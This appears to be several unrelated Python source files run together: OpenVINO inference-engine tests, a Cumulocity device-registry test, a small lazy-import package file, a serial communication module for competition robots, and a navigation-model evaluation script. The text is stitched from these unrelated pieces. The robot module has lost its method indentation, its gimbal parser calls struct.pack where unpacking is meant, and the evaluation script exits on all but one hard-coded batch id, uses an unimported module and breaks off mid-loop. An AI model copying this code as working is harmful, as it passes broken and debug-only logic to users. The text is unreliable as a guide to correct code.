        pytest.skip("Can't run on ARM plugin due-to ov_intel_cpu_plugin specific test")
    # Pick the plugins XML matching the current OS.
    if platform == "linux" or platform == "linux2":
        ie.register_plugins(plugins_xml)
    elif platform == "darwin":
        ie.register_plugins(plugins_osx_xml)
    elif platform == "win32":
        ie.register_plugins(plugins_win_xml)
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    exec_net = ie.load_network(net, "CUSTOM")
    assert isinstance(exec_net,
                      ExecutableNetwork), "Cannot load the network to the registered plugin with name 'CUSTOM' " \
                                          "registred in the XML file"
@pytest.mark.skip(reason="Need to figure out if it's expected behaviour (fails with C++ API as well")
def test_unregister_plugin(device):
    """Unregistering a plugin makes subsequent loads on it fail."""
    ie = IECore()
    ie.unregister_plugin(device)
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    with pytest.raises(RuntimeError) as e:
        ie.load_network(net, device)
    assert f"Device with '{device}' name is not registered in the InferenceEngine" in str(e.value)
def test_available_devices(device):
    """The device under test is reported by available_devices."""
    ie = IECore()
    devices = ie.available_devices
    assert device in devices, f"Current device '{device}' is not listed in available devices '{', '.join(devices)}'"
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
                    reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_list_of_str():
    """OPTIMIZATION_CAPABILITIES is reported as a list of strings."""
    ie = IECore()
    param = ie.get_metric("CPU", "OPTIMIZATION_CAPABILITIES")
    assert isinstance(param, list), "Parameter value for 'OPTIMIZATION_CAPABILITIES' " \
                                    f"metric must be a list but {type(param)} is returned"
    assert all(isinstance(v, str) for v in param), "Not all of the parameter values for 'OPTIMIZATION_CAPABILITIES' " \
                                                   "metric are strings!"


@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
                    reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_tuple_of_two_ints():
    """RANGE_FOR_STREAMS is reported as a tuple of ints."""
    ie = IECore()
    if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
        pytest.skip("Can't run on ARM plugin due-to unsupported device metric")
    param = ie.get_metric("CPU", "RANGE_FOR_STREAMS")
    assert isinstance(param, tuple), "Parameter value for 'RANGE_FOR_STREAMS' " \
                                     f"metric must be tuple but {type(param)} is returned"
    assert all(isinstance(v, int) for v in param), "Not all of the parameter values for 'RANGE_FOR_STREAMS' " \
                                                   "metric are integers!"


@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
                    reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_tuple_of_three_ints():
    """RANGE_FOR_ASYNC_INFER_REQUESTS is reported as a tuple of ints."""
    ie = IECore()
    if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
        pytest.skip("Can't run on ARM plugin due-to unsupported device metric")
    param = ie.get_metric("CPU", "RANGE_FOR_ASYNC_INFER_REQUESTS")
    assert isinstance(param, tuple), "Parameter value for 'RANGE_FOR_ASYNC_INFER_REQUESTS' " \
                                     f"metric must be tuple but {type(param)} is returned"
    assert all(isinstance(v, int) for v in param), "Not all of the parameter values for " \
                                                   "'RANGE_FOR_ASYNC_INFER_REQUESTS' metric are integers!"


@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
                    reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_str():
    """FULL_DEVICE_NAME is reported as a string."""
    ie = IECore()
    param = ie.get_metric("CPU", "FULL_DEVICE_NAME")
    assert isinstance(param, str), "Parameter value for 'FULL_DEVICE_NAME' " \
                                   f"metric must be string but {type(param)} is returned"
def test_read_network_from_xml():
    """read_network accepts XML with and without explicit weights."""
    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    assert isinstance(net, IENetwork)
    net = ie.read_network(model=test_net_xml)
    assert isinstance(net, IENetwork)


def test_read_network_as_path():
    """read_network accepts pathlib.Path for model and/or weights."""
    ie = IECore()
    net = ie.read_network(model=Path(test_net_xml), weights=test_net_bin)
    assert isinstance(net, IENetwork)
    net = ie.read_network(model=test_net_xml, weights=Path(test_net_bin))
    assert isinstance(net, IENetwork)
    net = ie.read_network(model=Path(test_net_xml))
    assert isinstance(net, IENetwork)


def test_read_network_from_onnx():
    """read_network accepts an ONNX model path."""
    ie = IECore()
    net = ie.read_network(model=test_net_onnx)
    assert isinstance(net, IENetwork)


def test_read_network_from_onnx_as_path():
    """read_network accepts an ONNX model as pathlib.Path."""
    ie = IECore()
    net = ie.read_network(model=Path(test_net_onnx))
    assert isinstance(net, IENetwork)


def test_incorrect_xml():
    """A missing model path raises with a helpful message."""
    ie = IECore()
    with pytest.raises(Exception) as e:
        ie.read_network(model="./model.xml", weights=Path(test_net_bin))
    assert "Path to the model ./model.xml doesn't exist or it's a directory" in str(e.value)


def test_incorrect_bin():
    """A missing weights path raises with a helpful message."""
    ie = IECore()
    with pytest.raises(Exception) as e:
        ie.read_network(model=test_net_xml, weights="./model.bin")
    assert "Path to the weights ./model.bin doesn't exist or it's a directory" in str(e.value)
def test_read_net_from_buffer():
    """read_network accepts in-memory model/weights buffers."""
    ie = IECore()
    with open(test_net_bin, 'rb') as f:
        bin = f.read()
    with open(model_path()[0], 'rb') as f:
        xml = f.read()
    net = ie.read_network(model=xml, weights=bin, init_from_buffer=True)
    assert isinstance(net, IENetwork)


def test_net_from_buffer_valid():
    """A buffer-loaded network matches the file-loaded reference network."""
    ie = IECore()
    with open(test_net_bin, 'rb') as f:
        bin = f.read()
    with open(model_path()[0], 'rb') as f:
        xml = f.read()
    net = ie.read_network(model=xml, weights=bin, init_from_buffer=True)
    ref_net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    assert net.name == ref_net.name
    assert net.batch_size == ref_net.batch_size
    # Inputs and outputs must agree by name with the reference network.
    ii_net = net.input_info
    ii_net2 = ref_net.input_info
    o_net = net.outputs
    o_net2 = ref_net.outputs
    assert ii_net.keys() == ii_net2.keys()
    assert o_net.keys() == o_net2.keys()
@pytest.mark.skipif(os.environ.get("TEST_DEVICE","CPU") != "GPU", reason=f"Device dependent test")
def test_load_network_release_gil(device):
    """load_network must release the GIL while the native call runs.

    A watcher thread sleeps in short intervals; if the GIL were held for the
    whole load_network call, a sleep would overshoot its deadline and the
    watcher would post the latency threshold onto the queue.
    """
    running = True
    message_queue = Queue()

    def detect_long_gil_holds():
        sleep_time = 0.01
        latency_alert_threshold = 0.1
        # Send a message to indicate the thread is running and ready to detect GIL locks
        message_queue.put("ready to detect")
        # `running` is read through the closure cell, so the outer rebinding
        # to False below terminates this loop.
        while running:
            start_sleep = time()
            sleep(sleep_time)
            elapsed = time() - start_sleep
            if elapsed > latency_alert_threshold:
                # Send a message to the testing thread that a long GIL lock occurred
                message_queue.put(latency_alert_threshold)

    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    # Wait for the GIL lock detector to be up and running
    gil_hold_detection_thread = Thread(daemon=True, target=detect_long_gil_holds)
    gil_hold_detection_thread.start()
    # Wait to make sure the thread is started and checking for GIL holds
    sleep(0.1)
    assert message_queue.get(timeout=5) == "ready to detect"
    # Run the function that should unlock the GIL
    exec_net = ie.load_network(net, device)
    # Ensure resources are closed
    running = False
    gil_hold_detection_thread.join(timeout=5)
    # Assert there were never any long gil locks
    assert message_queue.qsize() == 0, \
        f"More than 0 GIL locks occured! Latency: {message_queue.get()})"
def test_nogil_safe(device):
    """Run GIL-releasing core calls concurrently with other API calls.

    The main thread invokes a (potentially GIL-releasing) function while a
    second thread calls another API on the same core/network objects; a huge
    switch interval makes unsafe GIL handling far more likely to manifest.
    """
    call_thread_func = Event()
    switch_interval = sys.getswitchinterval()
    core = IECore()
    net = core.read_network(model=test_net_xml, weights=test_net_bin)

    def thread_target(thread_func, thread_args):
        # Wait until the main thread is about to enter the nogil call.
        call_thread_func.wait()
        call_thread_func.clear()
        thread_func(*thread_args)

    def main_thread_target(gil_release_func, args):
        call_thread_func.set()
        gil_release_func(*args)

    def test_run_parallel(gil_release_func, args, thread_func, thread_args):
        thread = Thread(target=thread_target, args=[thread_func, thread_args])
        # Make thread switches rare so overlap depends on the GIL being
        # released by the call under test, not on the scheduler.
        sys.setswitchinterval(1000)
        thread.start()
        main_thread_target(gil_release_func, args)
        thread.join()
        sys.setswitchinterval(switch_interval)

    # BUGFIX: these used to be dicts keyed by the callable; `getattr`
    # appeared multiple times as a key, so all but its last entry were
    # silently dropped.  Lists of (func, args) pairs keep every case.
    main_targets = [[
        (core.read_network, [test_net_xml, test_net_bin]),
        (core.load_network, [net, device]),
    ], [
        (core.load_network, [net, device]),
    ]]
    thread_targets = [[
        (core.get_versions, [device]),
        (core.read_network, [test_net_xml, test_net_bin]),
        (core.load_network, [net, device]),
        (core.query_network, [net, device]),
        (getattr, [core, "available_devices"]),
    ], [
        (getattr, [net, "name"]),
        (getattr, [net, "input_info"]),
        (getattr, [net, "outputs"]),
        (getattr, [net, "batch_size"]),
    ]]
    for main_target, custom_target in zip(main_targets, thread_targets):
        for nogil_func, args in main_target:
            for thread_func, thread_args in custom_target:
                test_run_parallel(nogil_func, args, thread_func, thread_args)
|
test_device_registry.py | # Copyright (c) 2020 Software AG,
# Darmstadt, Germany and/or Software AG USA Inc., Reston, VA, USA,
# and/or its subsidiaries and/or its affiliates and/or their licensors.
# Use, reproduction, transfer, publication or disclosure is prohibited except
# as specifically provided for in your License Agreement with Software AG.
# pylint: disable=redefined-outer-name
import os
import threading
import time
from datetime import datetime
import pytest
from c8y_api import CumulocityApi, CumulocityDeviceRegistry
from c8y_api.model import Device
from tests import RandomNameGenerator
@pytest.fixture(scope='session')
def device_registry(test_environment, logger) -> CumulocityDeviceRegistry:
    """Provide a device registry instance."""
    # the live_c8y instance already read/updated the environment
    required_vars = ('C8Y_BASEURL', 'C8Y_DEVICEBOOTSTRAP_TENANT',
                     'C8Y_DEVICEBOOTSTRAP_USER', 'C8Y_DEVICEBOOTSTRAP_PASSWORD')
    try:
        base_url, tenant, user, password = (os.environ[key] for key in required_vars)
    except KeyError as e:
        raise RuntimeError(f"Missing Cumulocity environment variable: {e} "
                           "Please define the required variables directly or setup a .env file.") from e
    return CumulocityDeviceRegistry(base_url, tenant, user, password)
@pytest.fixture(scope='function')
def sample_device(live_c8y: CumulocityApi, device_registry: CumulocityDeviceRegistry, logger) -> Device:
    """Provide a sample device, created via the device registry process."""
    device_id = RandomNameGenerator.random_name(3)
    # 1) create a device connection request
    live_c8y.device_inventory.request(device_id)
    # 2) continously try to accept the request
    # the request can be accepted once there was some communication
    # we will do this asynchronously
    def await_communication_and_accept():
        # pylint: disable=bare-except
        # Retry for up to ~50s; a failure just means the device has not
        # communicated yet.
        for _ in range(1, 100):
            try:
                live_c8y.device_inventory.accept(device_id)
                break
            except:
                logger.info("Unable to accept device request. Waiting for device communication.")
                time.sleep(0.5)
    threading.Thread(target=await_communication_and_accept).start()
    # 3) Wait for the request acceptance
    logger.info(f"Requesting credentials for device '{device_id}'.")
    device_api = device_registry.await_connection(device_id)
    logger.info("Credentials request accepted.")
    # 4) Create a digital twin
    device = Device(c8y=device_api, name=device_id, type='c8y_TestDevice').create()
    logger.info(f"Device created: '{device_id}', ID: {device.id}, Owner:{device.owner}")
    yield device
    # Teardown: remove the twin and the auto-created device user.
    logger.info("Deleting the device (and user) ...")
    device.delete()
    logger.info(f"Device '{device_id}' deleted.")
    live_c8y.users.delete(device.owner)
    logger.info(f"User '{device.owner}' deleted.")
def test_device_created(sample_device: Device):
    """Verify that the sample device was created properly."""
    # -> should have a database ID
    assert sample_device.id
    # -> should have been created less than 10s before
    now = time.time()
    creation_time = datetime.timestamp(sample_device.creation_datetime)
    # BUGFIX: the original asserted `creation_time - now < 10`, which is
    # always true since creation precedes "now" (the difference is <= 0);
    # the age of the device is now - creation_time.
    assert now - creation_time < 10
    # -> should have a proper device user as owner
    assert sample_device.owner == sample_device.c8y.username
    assert sample_device.owner == sample_device.get_username()
|
__init__.py | import threading
def htrain(*args, **kwargs):
    """Lazy wrapper around varvar.htrees.multiplicative_variance_trees."""
    from varvar.htrees import multiplicative_variance_trees as _htrain
    return _htrain(*args, **kwargs)


def qtrain(*args, **kwargs):
    """Lazy wrapper around varvar.qtrees.multiplicative_variance_trees."""
    from varvar.qtrees import multiplicative_variance_trees as _qtrain
    return _qtrain(*args, **kwargs)


def predict(*args, **kwargs):
    """Lazy wrapper around varvar.predict.predict."""
    from varvar.predict import predict as _predict
    return _predict(*args, **kwargs)


def import_():
    # Warm the submodule imports so the first real call does not pay the cost.
    import varvar.qtrees
    import varvar.htrees
    import varvar.predict


# Kick off the warm-up import in the background at package-import time.
_thread = threading.Thread(target=import_)
_thread.start()
|
connection.py | '''
Author: Ligcox
Date: 2021-04-06 15:20:21
LastEditors: Ligcox
LastEditTime: 2021-08-20 16:38:44
Description: The principal implementation of Birdiebot Communication Protocol
Apache License (http://www.apache.org/licenses/)
Shanghai University Of Engineering Science
Copyright (c) 2021 Birdiebot R&D department
'''
from config import *
from utils import *
from config.devConfig import *
from config.connConfig import *
class Connection(object):
    def __init__(self, p=PORTX, b=BPS, to=TIMEX):
        '''
        USART device wrapper; configuration lives in /src/config/devConfig.py.

        :param p: serial (COM) port identifier
        :param b: baud rate
        :param to: read timeout
        '''
        self.device = serial.Serial(port=p, baudrate=b, timeout=to)
        self.stop_flag = False
        self.status = STATUS
        self.tx_queue = []
        # tx_function / receive are defined elsewhere on this class.
        self.tx_thread = threading.Thread(target=self.tx_function, name="tx_thread")
        self.reset_rx_buffer()
        self.rx_queue = Queue()
        self.rx_thread = threading.Thread(target=self.receive, name="rx_thread")
        self.current_packet = copy.deepcopy(D_INFO)
        # Worker threads are started immediately on construction.
        self.start()
def start(self):
'''
description: 线程开始方法
param {*}
return {*}
'''
self.stop_flag = False
self.rx_thread.start()
self.tx_thread.start()
def stop(self):
'''
description: 线程结束方法
param {*}
return {*}
'''
self.stop_flag = True
self.rx_thread.join()
def reset_rx_buffer(self):
'''
description: 重置接收buffer
param {*}
return {*}
'''
self.current_packet = copy.deepcopy(D_INFO)
self.rx_status = 0
self.rx_datalen = 0
def rx_function(self):
'''
description: UART接收及处理
param {*}
return {*}
'''
rx_bytes = self.device.readall()
for rx_byte in rx_bytes:
if self.rx_status == 0: # 等待HEAD
if rx_byte == D_INFO["HEAD"]:
self.rx_status = 1
elif self.rx_status == 1: # 等待D_ADDR
if rx_byte == D_ADDR["mainfold"]:
self.current_packet["D_ADDR"] = rx_byte
self.rx_status = 2
else:
self.reset_rx_buffer()
elif self.rx_status == 2: # 等待ID
self.current_packet["ID"] = rx_byte
self.rx_status = 3
elif self.rx_status == 3: # 等待LEN
# 貌似python3直接转换byte->int
self.current_packet["LEN"] = rx_byte
if rx_byte == 0:
self.rx_status = 5
else:
self.rx_status = 4
elif self.rx_status == 4: # 等待DATA
self.current_packet["DATA"].append(rx_byte)
self.rx_datalen += 1
if self.rx_datalen >= self.current_packet["LEN"]:
self.rx_status = 5
elif self.rx_status == 5: # 等待SUM_CHECK
self.current_packet["SUM_CHECK"], self.current_packet["ADD_CHECK"] = sumcheck_cal(self.current_packet)
if rx_byte == self.current_packet["SUM_CHECK"]:
self.rx_status = 6
else: # 校验失败
self.reset_rx_buffer()
elif self.rx_status == 6: # 等待ADD_CHECK
if rx_byte == self.current_packet["ADD_CHECK"]:
self.rx_queue.put(copy.deepcopy(self.current_packet))
self.bcpAnalysis()
self.reset_rx_buffer() # 校验失败或者成功后都需要重设
@loger.AngleLoger
def gimbalAnalysis(self, bcpframe):
'''
description: 云台BCP数据解析
param {*}
return {*}
'''
self.status["yaw_angle"] = struct.pack("h", bcpframe["DATA"][0], bcpframe["DATA"][1]) /1000
self.status["pitch_angle"] = struct.pack("h", bcpframe["DATA"][2], bcpframe["DATA"][3]) /1000
return self.status["yaw_angle"], self.status["pitch_angle"]
def bcpAnalysis(self):
'''
description: BCP数据解析
param {*}
return {*}
'''
bcpframe = self.rx_queue.get(False)
if bcpframe["ID"] == ID["manifold_ctrl"]:
self.status["mode"] = bcpframe["DATA"][0]
elif bcpframe["ID"] == ID["barrel"]:
_val = bcpframe["DATA"][0]
self.status["isShoot"] = _val
elif bcpframe["ID"] == ID["chassis"]:
_val = bcpframe["DATA"][0]
self.status["pathway_direction"] = _val
elif bcpframe["ID"] == ID["chassis_speed"]:
_val = struct.pack("i", bcpframe["DATA"][0], bcpframe["DATA"][1], bcpframe["DATA"][2],bcpframe["DATA"][3])
self.status["pathway_speed"] = _val
elif bcpframe["ID"] == ID["gimbal_angle"]:
self.gimbalAnalysis(bcpframe)
def tx_function(self):
'''
description: USART发送方法
param {*}
return {*}
'''
while not self.stop_flag:
while len(self.tx_queue) != 0:
tx_packet = self.tx_queue.pop()
self.device.write(tx_packet)
time.sleep(getThreadingSleepTime("tx_threading"))
def send(self, tx_packet):
'''
description: 将数据放入发送buffer
param {*tx_packet: 发送的数据}
return {*}
'''
self.tx_queue.append(copy.deepcopy(tx_packet))
def receive(self):
'''
description: UAST接收方法
param {*}
return {*}
'''
while not self.stop_flag:
self.rx_function()
time.sleep(getThreadingSleepTime("rx_threading"))
class SerialInfo(object):
    """Holds one BCP frame and serializes it to raw bytes."""

    def __init__(self):
        """Start from a deep copy of the frame template so instances never
        share mutable state with the D_INFO constant."""
        self.INFO = copy.deepcopy(D_INFO)

    def getInfo(self):
        """Serialize the current frame as a bytearray.

        Layout: HEAD, D_ADDR, ID, LEN, DATA..., SUM_CHECK, ADD_CHECK.
        """
        frame = [self.INFO["HEAD"], self.INFO["D_ADDR"], self.INFO["ID"], self.INFO["LEN"]]
        frame.extend(self.INFO["DATA"])
        frame.append(self.INFO["SUM_CHECK"])
        frame.append(self.INFO["ADD_CHECK"])
        return bytearray(frame)
class Robot(SerialInfo):
    """Robot-side BCP endpoint; concrete robots are derived from this class."""

    def __init__(self, conn: Connection, name=None, data=None):
        """
        :param conn: Connection used to transmit frames
        :param name: key into D_ADDR identifying the destination robot
        :param data: optional (identif, data) pair applied via setDATA
        """
        super().__init__()
        self.name = name
        self.initRobot()
        self.conn = conn
        if data is not None:
            self.setDATA(*data)
        # heartbeat-frame bookkeeping
        self.beat_info = 0
        self.last_time = 0
        self.status = conn.status

    def __call__(self, idx, identif, data):
        """Build a one-off frame (ID *idx*, payload *data*) and return its bytes."""
        self.setID(idx)
        self.setDATA(identif, data)
        return self.getInfo()

    def setID(self, idx):
        """Set the frame ID from the BCP ID table.

        :param idx: key into the ID table defined by the protocol config
        """
        self.INFO["ID"] = ID[idx]

    def setDATA(self, identif, data):
        """Pack *data* with little-endian struct format *identif* and refresh checksums.

        Fix: LEN is now always derived from the packed payload length.  The
        old int branch hard-coded LEN = 1, which was wrong for any
        multi-byte format such as "h" or "i".

        :param identif: struct format characters (little-endian prefix added here)
        :param data: a single int or an iterable of values matching *identif*
        """
        identif = "<" + identif
        if isinstance(data, int):
            self.INFO["DATA"] = struct.pack(identif, data)
        else:
            self.INFO["DATA"] = struct.pack(identif, *data)
        self.INFO["LEN"] = len(self.INFO["DATA"])
        self.INFO["SUM_CHECK"], self.INFO["ADD_CHECK"] = sumcheck_cal(self.INFO)

    def initRobot(self):
        """Resolve this robot's destination address from its name."""
        self.INFO["D_ADDR"] = D_ADDR[self.name]

    @loger.ModeLoger
    def mode_ctrl(self, stu):
        '''
        @brief: mode control
        Sending any value toggles the sentry mode.
        # TODO
        '''
        self.setID("mode")
        self.setDATA("B", stu)
        self.conn.send(self.getInfo())
        return stu

    def launch(self):
        # NOTE(review): packing the whole INFO dict with an empty struct
        # format cannot succeed -- this method looks unfinished; confirm
        # intent before relying on it.
        self.setDATA("", self.INFO)

    @loger.GimbalLoger
    def gimbal(self, yaw_angle, pitch_angle):
        '''
        @brief: command a gimbal deflection
        Angles are sent as milli-units in two little-endian int16 fields.
        '''
        self.setID("gimbal")
        self.setDATA("hh", (int(yaw_angle*1000), int(pitch_angle*1000)))
        self.conn.send(self.getInfo())
        return yaw_angle, pitch_angle

    @loger.BarrelLoger
    def barrel(self, speed, stu):
        '''
        @brief: barrel firing command
        stu: 0 = fire, 1 = do not fire
        '''
        self.setID("barrel")
        self.setDATA("BB", (speed, stu))
        self.conn.send(self.getInfo())
        return stu

    def heartbeat(self):
        '''
        :brief: heartbeat frame, sent at most once every 50 ms;
        the payload toggles between 0 and 1 on every beat
        '''
        if time.time() - self.last_time >= 0.05:
            self.setID("heartbeat")
            self.beat_info = 0 if self.beat_info == 1 else 1
            self.setDATA("B", self.beat_info)
            self.conn.send(self.getInfo())
            self.last_time = time.time()

    @loger.PathwayLoger
    def pathway(self, stu):
        '''
        @brief: rail control: 0xAA = ignore rail info, 0x00 = projectile
        centered, 0x01 = projectile on the right, -0x01 = on the left
        '''
        self.setID("chassis")
        self.setDATA("b", stu)
        self.conn.send(self.getInfo())
        return stu

    # @loger.PathwayLoger
    def devError(self, stu):
        '''
        @brief: device-fault report
        @param: stu: id of the faulty thread
        '''
        self.setID("deverror")
        self.setDATA("b", stu)
        self.conn.send(self.getInfo())
        return stu
class Sentry_up(Robot):
    """BCP endpoint bound to the "sentry_up" destination address."""

    def __init__(self, conn, name="sentry_up"):
        super().__init__(conn, name=name)
class Hero(Robot):
    """BCP endpoint bound to the "hero" destination address."""

    def __init__(self, conn, name="hero"):
        super().__init__(conn, name=name)
class Sentry_down(Robot):
    """BCP endpoint bound to the "sentry_down" destination address."""

    def __init__(self, conn, name="sentry_down"):
        super().__init__(conn, name=name)
class Infantry(Robot):
    """BCP endpoint bound to the "infantry" destination address."""

    def __init__(self, conn, name="infantry"):
        super().__init__(conn, name=name)
class Engineer(Robot):
    """BCP endpoint bound to the "engineer" destination address."""

    def __init__(self, conn, name="engineer"):
        super().__init__(conn, name=name)
train_nav.py | import time
import argparse
from datetime import datetime
import logging
import numpy as np
import os
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from models import NavCnnModel, NavCnnRnnModel, NavCnnRnnMultModel, NavPlannerControllerModel
from data import EqaDataLoader
from metrics import NavMetric
from models import MaskedNLLCriterion
from models import get_state, ensure_shared_grads
from data import load_vocab
from torch.autograd import Variable
from tqdm import tqdm
import time
import cv2
import csv
import pickle as pkl
from collections import defaultdict
# cuDNN disabled globally -- presumably for reproducibility or driver
# compatibility; the reason is not stated here, confirm before changing.
torch.backends.cudnn.enabled = False
################################################################################################
#make models trained in pytorch 4 compatible with earlier pytorch versions
import torch._utils
try:
    # Probe whether this torch build already provides the v2 rebuild hook.
    torch._utils._rebuild_tensor_v2
except AttributeError:
    # Older torch: install a shim so checkpoints serialized with the v2
    # protocol can still be deserialized via the v1 _rebuild_tensor.
    def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
        tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
        tensor.requires_grad = requires_grad
        tensor._backward_hooks = backward_hooks
        return tensor
    torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
################################################################################################
def oneHot(vec, dim):
    """Return a (batch, dim) float tensor with a 1 at each index given in *vec*."""
    n = vec.size(0)
    encoded = torch.zeros(n, dim)
    rows = np.arange(n)
    encoded[rows, vec.long()] = 1
    return encoded
def load_semantic_classes(color_file):
    """Parse a colormap CSV into {lower-cased class name: uint8 color triple}.

    The CSV must provide 'name', 'r', 'g', 'b' columns; raises ValueError
    when no path is given.
    """
    if color_file is None:
        raise ValueError('please input colormap_fine.csv file')
    semantic_classes = {}
    with open(color_file) as fh:
        for row in csv.DictReader(fh):
            # channel values are stored in (r, g, b) column order here;
            # note the original comment mentions OpenCV's BGR convention
            color = np.array((row['r'], row['g'], row['b']), dtype=np.uint8)
            semantic_classes[row['name'].lower()] = color
    return semantic_classes
def coverage(img, target_obj_class, semantic_classes):
    """Fraction of pixels in *img* whose color equals the target class color.

    :param img: H x W x C image array
    :param target_obj_class: key into *semantic_classes*
    :param semantic_classes: mapping of class name -> color triple
    """
    height, width = img.shape[0], img.shape[1]
    target_color = semantic_classes[target_obj_class]
    match_mask = np.all(img == target_color, axis=2)
    return np.sum(match_mask) / (height * width)
def avgCov(cov_dict):
    """Average coverage over the [-6:-1] window of every logged episode.

    *cov_dict* is nested {t: {batch: {init: [cov..., label]}}}; the slice
    skips the trailing element (the episode's appended class label).
    """
    total = 0.0
    episodes = 0
    for t_key in list(cov_dict.keys()):
        for batch_key in list(cov_dict[t_key].keys()):
            for init_key in list(cov_dict[t_key][batch_key].keys()):
                window = cov_dict[t_key][batch_key][init_key][-6:-1]
                total += np.sum(np.array(window))
                episodes += 1
    return total / episodes
def eval(rank, args, shared_model, best_eval_acc):
    """Evaluation worker: replays navigation episodes at several spawn
    offsets (10/30/50 steps from the end), records distance/room/stop
    metrics, and checkpoints when d_D_50 improves.

    :param rank: worker index (used for per-worker log file names)
    :param args: parsed command-line arguments
    :param shared_model: model whose weights are copied before each pass
    :param best_eval_acc: best d_D_50 seen so far (NOTE: immediately
        overwritten below -- see comment)
    :return: best d_D_50 achieved during this call
    """
    #torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    if args.model_type == 'cnn':
        model_kwargs = {}
        model = NavCnnModel(**model_kwargs)
    elif args.model_type == 'cnn+q':
        model_kwargs = {
            'question_input': True,
            'question_vocab': load_vocab(args.vocab_json)
        }
        model = NavCnnModel(**model_kwargs)
    elif args.model_type == 'lstm':
        model_kwargs = {}
        model = NavCnnRnnModel(**model_kwargs)
    elif args.model_type == 'lstm+q':
        model_kwargs = {
            'question_input': True,
            'question_vocab': load_vocab(args.vocab_json)
        }
        model = NavCnnRnnModel(**model_kwargs)
    elif args.model_type == 'lstm-mult+q':
        model_kwargs = {
            'question_input': True,
            'question_vocab': load_vocab(args.vocab_json)
        }
        model = NavCnnRnnMultModel(**model_kwargs)
    elif args.model_type == 'pacman':
        model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
        model = NavPlannerControllerModel(**model_kwargs)
    else:
        exit()
    eval_loader_kwargs = {
        'questions_h5': getattr(args, args.eval_split + '_h5'),
        'data_json': args.data_json,
        'vocab': args.vocab_json,
        'target_obj_conn_map_dir': args.target_obj_conn_map_dir,
        'map_resolution': args.map_resolution,
        'batch_size': 1,
        'input_type': args.model_type,
        'num_frames': 5,
        'split': args.eval_split,
        'max_threads_per_gpu': args.max_threads_per_gpu,
        'gpu_id': 0,
        'to_cache': False,
        'overfit': args.overfit,
        'max_controller_actions': args.max_controller_actions,
    }
    eval_loader = EqaDataLoader(**eval_loader_kwargs)
    print('eval_loader has %d samples' % len(eval_loader.dataset))
    logging.info("EVAL: eval_loader has {} samples".format(len(eval_loader.dataset)))
    # semantic colormap used to compute per-frame target-object coverage
    semantic_classes = load_semantic_classes(eval_loader.dataset.cfg['colorFile'])
    coverage_log = defaultdict(dict)
    args.output_log_path = os.path.join(args.log_dir,
                                        'eval_' + str(rank) + '.json')
    # NOTE(review): this line discards the best_eval_acc passed by the
    # caller -- the parameter is effectively ignored; confirm intent.
    t, epoch, best_eval_acc = 0, 0, 0.0
    max_epochs = args.max_epochs
    if args.mode == 'eval':
        max_epochs = 1
    # NOTE(review): loop runs a single epoch regardless of max_epochs.
    while epoch < 1:
        invalids = []
        model.load_state_dict(shared_model.state_dict())
        model.eval()
        # that's a lot of numbers
        metrics = NavMetric(
            info={'split': args.eval_split,
                  'thread': rank},
            metric_names=[
                'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
                'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
                'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
                'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
                'ep_len_30', 'ep_len_50'
            ],
            log_json=args.output_log_path)
        if 'cnn' in args.model_type:
            done = False
            while done == False:
                for batch in tqdm(eval_loader):
                    model.load_state_dict(shared_model.state_dict())
                    model.to(device)
                    idx, questions, _, img_feats, actions_in, actions_out, action_length = batch
                    ##########
                    #Sai analysis
                    # pdb.set_trace()
                    # NOTE(review): leftover debug filter -- aborts the run for
                    # any batch not containing id 364909, and `sys` does not
                    # appear in this module's import list; confirm and remove.
                    if 364909 in idx:
                        #pass
                        question = torch.tensor([[105, 25, 53, 94, 72, 50, 94, 11, 2, 0]])
                    else:
                        sys.exit(1)
                    ##########
                    metrics_slug = {}
                    # evaluate at multiple initializations
                    for i in [10, 30, 50]:
                        t += 1
                        if action_length[0] + 1 - i - 5 < 0:
                            invalids.append(idx[0])
                            continue
                        ep_inds = [
                            x for x in range(action_length[0] + 1 - i - 5,
                                             action_length[0] + 1 - i)
                        ]
                        sub_img_feats = torch.index_select(
                            img_feats, 1, torch.LongTensor(ep_inds))
                        init_pos = eval_loader.dataset.episode_pos_queue[
                            ep_inds[-1]]
                        h3d = eval_loader.dataset.episode_house
                        h3d.env.reset(
                            x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
                        init_dist_to_target = h3d.get_dist_to_target(
                            h3d.env.cam.pos)
                        if init_dist_to_target < 0:  # unreachable
                            invalids.append(idx[0])
                            continue
                        sub_img_feats_var = Variable(sub_img_feats.to(device))
                        if '+q' in args.model_type:
                            questions_var = Variable(questions.to(device))
                        # sample actions till max steps or <stop>
                        # max no. of actions = 100
                        episode_length = 0
                        episode_done = True
                        dists_to_target, pos_queue, actions = [
                            init_dist_to_target
                        ], [init_pos], []
                        for step in range(args.max_episode_length):
                            episode_length += 1
